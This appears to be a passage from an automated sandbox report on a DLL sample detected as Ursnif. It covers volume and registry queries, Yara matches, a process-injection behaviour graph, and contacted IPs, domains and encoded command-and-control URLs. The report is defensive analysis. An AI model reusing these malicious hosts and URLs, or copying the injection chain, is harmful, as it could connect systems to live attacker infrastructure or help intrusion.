Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EA303 cpuid 0_2_013EA303
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102E521 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0102E521
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E5C7F GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_013E5C7F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E4638 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError, 0_2_013E4638
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EA303 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_013EA303

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 539453 Sample: 61b85f75e6a7c.dll Startdate: 14/12/2021 Architecture: WINDOWS Score: 100 81 8.8.8.8.in-addr.arpa 2->81 83 1.0.0.127.in-addr.arpa 2->83 109 Found malware configuration 2->109 111 Malicious sample detected (through community Yara rule) 2->111 113 Yara detected  Ursnif 2->113 115 10 other signatures 2->115 9 loaddll32.exe 1 2->9         started        13 mshta.exe 2->13         started        15 mshta.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 97 windows.update3.com 9->97 99 berukoneru.website 9->99 101 2 other IPs or domains 9->101 141 Writes to foreign memory regions 9->141 143 Allocates memory in foreign processes 9->143 145 Modifies the context of a thread in another process (thread injection) 9->145 147 3 other signatures 9->147 19 regsvr32.exe 9->19         started        23 rundll32.exe 9->23         started        25 cmd.exe 1 9->25         started        27 control.exe 9->27         started        29 powershell.exe 13->29         started        32 powershell.exe 15->32         started        34 powershell.exe 17->34         started        36 powershell.exe 17->36         started        signatures6 process7 dnsIp8 85 3.20.161.64, 443, 49792, 49795 AMAZON-02US United States 19->85 87 windows.update3.com 19->87 93 2 other IPs or domains 19->93 117 System process connects to network (likely due to code injection or exploit) 19->117 119 Writes to foreign memory regions 19->119 121 Allocates memory in foreign processes 19->121 129 2 other signatures 19->129 38 control.exe 19->38         started        89 18.219.227.107, 443, 49790, 49793 AMAZON-02US United States 23->89 91 windows.update3.com 23->91 95 2 other IPs or domains 23->95 123 Modifies the context of a thread in another process (thread injection) 23->123 125 Maps a DLL or memory area into another process 23->125 41 control.exe 23->41         started        43 rundll32.exe 1 25->43         started        69 C:\Users\user\AppData\...\jtmpm3o0.cmdline, UTF-8 29->69 dropped 127 Creates a thread in another existing process (thread injection) 29->127 46 csc.exe 29->46         started        53 2 other processes 29->53 49 csc.exe 32->49         started        51 conhost.exe 32->51         started        55 2 other processes 34->55 57 2 other processes 36->57 file9 signatures10 process11 dnsIp12 131 Modifies the context of a thread in another process (thread injection) 41->131 133 Maps a DLL or memory area into another process 41->133 103 berukoneru.website 79.110.52.144, 443, 49812, 49813 V4ESCROW-ASRO Romania 43->103 105 windows.update3.com 43->105 107 prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com 3.12.124.139, 443, 49789, 49791 AMAZON-02US United States 43->107 135 System process connects to network (likely due to code injection or exploit) 43->135 137 Writes to foreign memory regions 43->137 139 Writes registry values via WMI 43->139 59 control.exe 43->59         started        71 C:\Users\user\AppData\Local\...\jtmpm3o0.dll, PE32 46->71 dropped 61 cvtres.exe 46->61         started        73 C:\Users\user\AppData\Local\...\kon0vos3.dll, PE32 49->73 dropped 63 cvtres.exe 49->63         started        75 C:\Users\user\AppData\Local\...\gmpgobli.dll, PE32 53->75 dropped 77 C:\Users\user\AppData\Local\...\wnczrnms.dll, PE32 55->77 dropped 65 cvtres.exe 55->65         started        79 C:\Users\user\AppData\Local\...\hupbkl0t.dll, PE32 57->79 dropped 67 cvtres.exe 57->67         started        file13 signatures14 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
3.20.161.64
 unknown United States
16509 AMAZON-02US true
79.110.52.144
 berukoneru.website Romania
60233 V4ESCROW-ASRO true
18.219.227.107
 unknown United States
16509 AMAZON-02US true
3.12.124.139
 prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com United States
16509 AMAZON-02US false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com 3.12.124.139 true
berukoneru.website 79.110.52.144 true
1.0.0.127.in-addr.arpa unknown unknown
windows.update3.com unknown unknown
8.8.8.8.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://berukoneru.website/tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta true
  • Avira URL Cloud: safe
 unknown
https://berukoneru.website/tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta true
  • Avira URL Cloud: safe
 unknown
https://berukoneru.website/tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta true
  • Avira URL Cloud: safe
 unknown
https://berukoneru.website/tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta true
  • Avira URL Cloud: safe
 unknown
https://berukoneru.website/tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta true
  • Avira URL Cloud: safe
 unknown
https://berukoneru.website/tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta true
  • Avira URL Cloud: safe
 unknown
https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta true
  • Avira URL Cloud: safe
 unknown
